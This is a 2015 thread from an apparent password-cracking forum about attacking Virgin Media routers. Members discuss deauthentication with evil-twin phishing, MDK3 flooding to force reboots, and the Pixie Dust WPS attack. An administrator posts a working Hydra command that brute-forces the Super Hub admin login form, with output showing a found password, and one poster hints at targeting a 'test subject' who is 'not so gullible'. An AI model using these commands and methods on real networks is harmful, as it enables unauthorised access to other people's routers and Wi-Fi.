NEW: We have a Discord server now. Click here to go there now!

NOTE: Why not use our List Manager to crack your lists? Its easy and enables better management.

NOTE: When cracking WPA/WPA2 passwords, make sure you check gpuhash.me first incase it's already been processed.

Home - Wireless Cracking - Code to reboot Virgin Media Router


11 Results - Page 1 of 1 -
1
Author Message
Avatar
Hash-IT

Status: Trusted
Joined: Tue, 02 Aug 2011
Posts: 4598
Team: HashKiller
Reputation: 2982 Reputation
Offline
Mon, 02 Mar 2015 @ 15:59:17

I was reading this interesting attack.

LINK


The guy said ...


said:

Using just a few lines of code, it's possible to force the router to reboot remotely.


I am unsure how this is possible when the attacker does not yet have access to the network or the admin panel.

Anyone know if this is true or better still, anyone have the code ???


Please read the forum rules. | Please read the paid section rules.

BTC: 1MmWESN5bKZ1YSuHrm5uNwnQYxWyQnEQ6E

Avatar
hacker-zone

Status: Banned
Joined: Wed, 12 Nov 2014
Posts: 90
Team:
Reputation: 90 Reputation
Offline
Mon, 02 Mar 2015 @ 19:18:03

WARNING! User is BANNED and maybe a SCAMMER.

Virgin were made aware of this flaw in may of last year.
A lot has been spoken about it but there hasn't been any sign of code written anywhere.
Would you not get the same result with WifiPhisher or Linset?

All you need to do is deauth the router and setup an evil twin.


BTC: 1JAc5xbxwfUj4Lo2RAtmYPbkXntknsJNwf

Avatar
Hash-IT

Status: Trusted
Joined: Tue, 02 Aug 2011
Posts: 4598
Team: HashKiller
Reputation: 2982 Reputation
Offline
Mon, 02 Mar 2015 @ 21:46:42

I just cannot think how he can claim to be able to power off and re-boot a router remotely, without having the WPA key or LAN access.

Yes those 2 scripts look good, thanks for suggesting them. Unfortunately they require a gullible victim, my "test subject" is not so gullible


Please read the forum rules. | Please read the paid section rules.

BTC: 1MmWESN5bKZ1YSuHrm5uNwnQYxWyQnEQ6E

Avatar
hacker-zone

Status: Banned
Joined: Wed, 12 Nov 2014
Posts: 90
Team:
Reputation: 90 Reputation
Offline
Mon, 02 Mar 2015 @ 21:53:17

WARNING! User is BANNED and maybe a SCAMMER.

You might be able to cause the router to reboot by overloading it with requests, I know this was possible a long time ago using MDK3.


BTC: 1JAc5xbxwfUj4Lo2RAtmYPbkXntknsJNwf

Avatar
Hash-IT

Status: Trusted
Joined: Tue, 02 Aug 2011
Posts: 4598
Team: HashKiller
Reputation: 2982 Reputation
Offline
Mon, 02 Mar 2015 @ 21:56:15

Really, that is surprising.

Was this just Virgin routers ?

I wonder how he would know when his 7 seconds has started if he is simply brute forcing deauths ?

Ohh you have got me interested now.


Please read the forum rules. | Please read the paid section rules.

BTC: 1MmWESN5bKZ1YSuHrm5uNwnQYxWyQnEQ6E

Avatar
hacker-zone

Status: Banned
Joined: Wed, 12 Nov 2014
Posts: 90
Team:
Reputation: 90 Reputation
Offline
Mon, 02 Mar 2015 @ 23:43:43

WARNING! User is BANNED and maybe a SCAMMER.

Have you heard much about the Pixie Dust attack to crack the WPS key offline?
I hear it could be coming to Kali Linux soon.


BTC: 1JAc5xbxwfUj4Lo2RAtmYPbkXntknsJNwf

Avatar
Hash-IT

Status: Trusted
Joined: Tue, 02 Aug 2011
Posts: 4598
Team: HashKiller
Reputation: 2982 Reputation
Offline
Mon, 02 Mar 2015 @ 23:59:40

"Pixie Dust" LOL No I haven't heard about that until now. Who comes up with these names


Please read the forum rules. | Please read the paid section rules.

BTC: 1MmWESN5bKZ1YSuHrm5uNwnQYxWyQnEQ6E

Avatar
hacker-zone

Status: Banned
Joined: Wed, 12 Nov 2014
Posts: 90
Team:
Reputation: 90 Reputation
Offline
Tue, 03 Mar 2015 @ 00:06:49

WARNING! User is BANNED and maybe a SCAMMER.

Dominique Bongard.
From what I have read it looks as though we are able to capture packets to use offline and decrypt them to get the 2 separate halfs of the WPS key.
There is talk about implementing this tool into reaver.


BTC: 1JAc5xbxwfUj4Lo2RAtmYPbkXntknsJNwf

Avatar
Hash-IT

Status: Trusted
Joined: Tue, 02 Aug 2011
Posts: 4598
Team: HashKiller
Reputation: 2982 Reputation
Offline
Tue, 03 Mar 2015 @ 00:16:33

Awesome, that is going to be brutal !

Link to his PDF.

https://passwordscon.org/wp-content/uploads/2014/08/Dominique_Bongard.pdf


Please read the forum rules. | Please read the paid section rules.

BTC: 1MmWESN5bKZ1YSuHrm5uNwnQYxWyQnEQ6E

Avatar
Milzo
Administrator
Status: Trusted
Joined: Sat, 29 Dec 2012
Posts: 3095
Team:
Reputation: 5065 Reputation
Online
Tue, 03 Mar 2015 @ 10:59:23

Code:
Virgin Super Hub 1 | LAN only | Hydra Brute Force

or with WAN if remote management as been enabled on port 8080 (rare) port

POC (Permission Granted)

hydra -l admin -P ~/Dropbox/sample-pass.txt -f -V -t 4 192.168.0.1 http-post-form "/goform/VmLogin:VmLoginUsername=^USER^&VmLoginPassword=^PASS^&VmLoginErrorCode=0&VmChangePasswordHint=0:S=home.asp"
Hydra v8.2-dev (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2015-03-03 10:35:34
[DATA] max 4 tasks per 1 server, overall 64 tasks, 141 login tries (l:1/p:141), ~0 tries per task
[DATA] attacking service http-post-form on port 80
[ATTEMPT] target 192.168.0.1 - login "admin" - pass "pxltart13" - 1 of 141 [child 0]
[ATTEMPT] target 192.168.0.1 - login "admin" - pass "bob13ism" - 2 of 141 [child 1]
[ATTEMPT] target 192.168.0.1 - login "admin" - pass "K@ila$h" - 3 of 141 [child 2]
[ATTEMPT] target 192.168.0.1 - login "admin" - pass "esseufoma" - 4 of 141 [child 3]
[ATTEMPT] target 192.168.0.1 - login "admin" - pass "USAsvc1" - 5 of 141 [child 0]
[ATTEMPT] target 192.168.0.1 - login "admin" - pass "d408t226" - 6 of 141 [child 1]
[ATTEMPT] target 192.168.0.1 - login "admin" - pass "chloeak0" - 7 of 141 [child 2]
[ATTEMPT] target 192.168.0.1 - login "admin" - pass "al1th1in" - 8 of 141 [child 3]
[ATTEMPT] target 192.168.0.1 - login "admin" - pass "Caetey" - 9 of 141 [child 0]
[ATTEMPT] target 192.168.0.1 - login "admin" - pass "Bcoop516" - 10 of 141 [child 1]
[ATTEMPT] target 192.168.0.1 - login "admin" - pass "viper0023" - 11 of 141 [child 2]
[ATTEMPT] target 192.168.0.1 - login "admin" - pass "saipmmyi" - 12 of 141 [child 3]
[80][http-post-form] host: 192.168.0.1   login: admin   password: viper0023
[STATUS] attack finished for 192.168.0.1 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2015-03-03 10:35:38

----
The router doesn't lock you out after failed attempts unlike BTHub 3/4/5 . with 1 minute increments after each failed attempt one triggered.

Get up and running with hydra:

Code:
cd;sudo apt-get remove hydra hydra-gtk;sudo apt-get install git; git clone https://github.com/vanhauser-thc/thc-hydra.git;cd thc-hydra;./configure && make;sudo make install;cd thc-hydra

----

Need to try and emulated the 7 second flaw if it still exists. they've had nearly a year to patch it with firmware updates. 


Powershell script to reboot/restore router





Avatar
Hash-IT

Status: Trusted
Joined: Tue, 02 Aug 2011
Posts: 4598
Team: HashKiller
Reputation: 2982 Reputation
Offline
Fri, 06 Mar 2015 @ 19:14:23

Thank for your help user Nice find with the power shell script.

After much reading, I think the only way he must be doing this is with MDK3, as hacker-zone mentioned.

It does seem from posts on other forums that some Virgin routers do indeed shut down and restart their wifi if they become overwhelmed by MDK3.

I think logging in to the Admin page would have to be scripted to be fast enough to be within the 7 seconds required to view the password.

Interesting attack


Please read the forum rules. | Please read the paid section rules.

BTC: 1MmWESN5bKZ1YSuHrm5uNwnQYxWyQnEQ6E


11 Results - Page 1 of 1 -
1

We have a total of 211874 messages in 25988 topics.
We have a total of 22994 registered users.
Our newest registered member is PassGuy25.